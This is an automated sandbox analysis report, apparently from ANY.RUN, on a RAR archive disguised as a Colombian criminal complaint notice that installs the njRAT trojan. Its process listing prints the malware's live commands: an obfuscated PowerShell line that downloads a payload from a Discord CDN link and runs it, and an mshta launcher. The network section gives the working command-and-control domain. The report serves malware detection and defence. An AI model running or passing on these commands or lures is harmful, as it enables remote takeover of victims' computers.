File name:

Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA (2).r21

Full analysis: https://app.any.run/tasks/39887e39-3961-432f-8a36-4c3ce18e614a
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Analysis date: August 19, 2021, 17:35:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
njrat
bladabindi
Indicators:
MIME: application/x-rar
File info: RAR archive data, v4, os: Win32
MD5:

24C924282546739EA201F33E19367174

SHA1:

25FE06CC9CD6BAE34F7D9BEC4F161FC23509BC08

SHA256:

5FBBB1EE021D8FF80376CA2EB9A33BDCCC581B7290A5D4104E039CD6EAB2A638

SSDEEP:

192:qhn4BVUHy4kuDaKf/gWfdwJxQXGrluqOnwQqR+59HbIxL0sRaP:q94DUHy4haKgWfdUiGknwQj59HUysS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
    • Writes to a start menu file

      • powershell.exe (PID: 3116)
    • Executes PowerShell scripts

      • mshta.exe (PID: 744)
    • NJRAT was detected

      • vbc.exe (PID: 3300)
    • Connects to CnC server

      • vbc.exe (PID: 3300)
  • SUSPICIOUS

    • Drops a file with a compile date too recent

      • WinRAR.exe (PID: 3820)
    • Reads the computer name

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • WinRAR.exe (PID: 3820)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • powershell.exe (PID: 3116)
      • WScript.exe (PID: 3044)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
      • mshta.exe (PID: 744)
      • powershell.exe (PID: 2444)
      • vbc.exe (PID: 1468)
      • vbc.exe (PID: 3740)
      • vbc.exe (PID: 3300)
      • vbc.exe (PID: 3572)
      • WScript.exe (PID: 3244)
    • Checks supported languages

      • WinRAR.exe (PID: 3820)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • WScript.exe (PID: 3244)
      • WScript.exe (PID: 3044)
      • cmd.exe (PID: 2192)
      • powershell.exe (PID: 3116)
      • powershell.exe (PID: 2444)
      • mshta.exe (PID: 744)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
      • vbc.exe (PID: 1468)
      • vbc.exe (PID: 3300)
      • vbc.exe (PID: 3740)
      • vbc.exe (PID: 3572)
    • Drops a file that was compiled in debug mode

      • WinRAR.exe (PID: 3820)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3820)
    • Reads Environment values

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • powershell.exe (PID: 3116)
      • vbc.exe (PID: 1468)
      • vbc.exe (PID: 3740)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
    • Changes tracing settings of the file or console

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3244)
    • Creates files in the user directory

      • powershell.exe (PID: 3116)
      • powershell.exe (PID: 2444)
    • Executes scripts

      • powershell.exe (PID: 3116)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
      • vbc.exe (PID: 1468)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • vbc.exe (PID: 3740)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3044)
    • Reads the date of Windows installation

      • powershell.exe (PID: 3116)
      • powershell.exe (PID: 2444)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2192)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 744)
    • Application launched itself

      • vbc.exe (PID: 1468)
      • vbc.exe (PID: 3740)
  • INFO

    • Manual execution by user

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
      • WScript.exe (PID: 3244)
    • Reads settings of System Certificates

      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 3948)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 2712)
      • powershell.exe (PID: 3116)
      • vbc.exe (PID: 3740)
      • Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe (PID: 1808)
      • vbc.exe (PID: 1468)
    • Checks Windows Trust Settings

      • WScript.exe (PID: 3044)
      • WScript.exe (PID: 3244)
    • Reads internet explorer settings

      • mshta.exe (PID: 744)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)

EXIF

ZIP

ArchivedFileName: Copia de la denuncia fiscal presentada en su contra NUNC Numero Unico de Noticia Criminal ESM.vbs
PackingMethod: Normal
ModifyDate: 2021:08:13 17:25:11
OperatingSystem: Win32
UncompressedSize: 828
CompressedSize: 611
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
15
Malicious processes
7
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winrar.exe notificacion fiscal a su nombre agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe notificacion fiscal a su nombre agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe wscript.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs vbc.exe no specs notificacion fiscal a su nombre agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe vbc.exe vbc.exe #NJRAT vbc.exe vbc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
744mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")C:\Windows\system32\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
1468"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
12.0.51209.34209
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\vbc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1808"C:\Users\admin\Desktop\Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe" C:\Users\admin\Desktop\Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\desktop\notificacion fiscal a su nombre agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2192C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\SystemLogin.bat" "C:\Windows\system32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2388"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeNotificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
4294967295
Version:
12.0.51209.34209
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\microsoft.net\framework\v4.0.30319\vbc.exe
2444"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.2.9200.16398 (win8_gdr_oobssr.120820-1900)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2712"C:\Users\admin\Desktop\Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe" C:\Users\admin\Desktop\Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\desktop\notificacion fiscal a su nombre agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3044"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft � Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\wscript.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3116"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/863849505244971012/875213043489980426/ojooooo.txt');$resultsC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.2.9200.16398 (win8_gdr_oobssr.120820-1900)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
3244"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Copia de la denuncia fiscal presentada en su contra NUNC Numero Unico de Noticia Criminal ESM.vbs" C:\Windows\System32\WScript.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft � Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
Total events
23 002
Read events
22 734
Write events
268
Delete events
0

Modification events

(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3820) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\171\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA (2).r21.rar
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3820) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\171\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4802
Value:
VBScript Script File
(PID) Process:(3820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\Desktop
Executable files
1
Suspicious files
6
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3116powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexpi2
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1d0e2b.TMPbinary
MD5:
SHA256:
3820WinRAR.exeC:\Users\admin\Desktop\Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exeexecutable
MD5:
SHA256:
3820WinRAR.exeC:\Users\admin\Desktop\Copia de la denuncia fiscal presentada en su contra NUNC Numero Unico de Noticia Criminal ESM.vbstext
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWCDPIZAZBPSR82NMXTN.tempbinary
MD5:
SHA256:
2444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1d24e0.TMPbinary
MD5:
SHA256:
2444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A1FGX40YA9AVXVIKENNO.tempbinary
MD5:
SHA256:
3116powershell.exeC:\Users\admin\AppData\Roaming\SystemLogin.battext
MD5:7F85382953FDE20B101039D48673DBD2
SHA256:FDE417AD1B13A97ACFA8E409789A92C4C3DDF6303851337CA31B94BFAC634E4F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
7
DNS requests
2
Threats
4

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3948
Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
2712
Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
3116
powershell.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
1808
Notificacion fiscal a su nombre Agradecemos pronta confirmacion de recibido sumado a ello diligenciar el formulario dentro del adjunto.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
1468
vbc.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
3740
vbc.exe
162.159.130.233:443
cdn.discordapp.com
Cloudflare Inc
shared
3300
vbc.exe
188.126.90.8:2001
envirojo2021.duckdns.org
Portlane AB
SE
malicious

DNS requests

Domain
IP
Reputation
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.135.233
  • 162.159.134.233
  • 162.159.129.233
  • 162.159.133.233
shared
envirojo2021.duckdns.org
  • 188.126.90.8
malicious

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3300
vbc.exe
A Network Trojan was detected
ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)
2 ETPRO signatures available at the full report
No debug info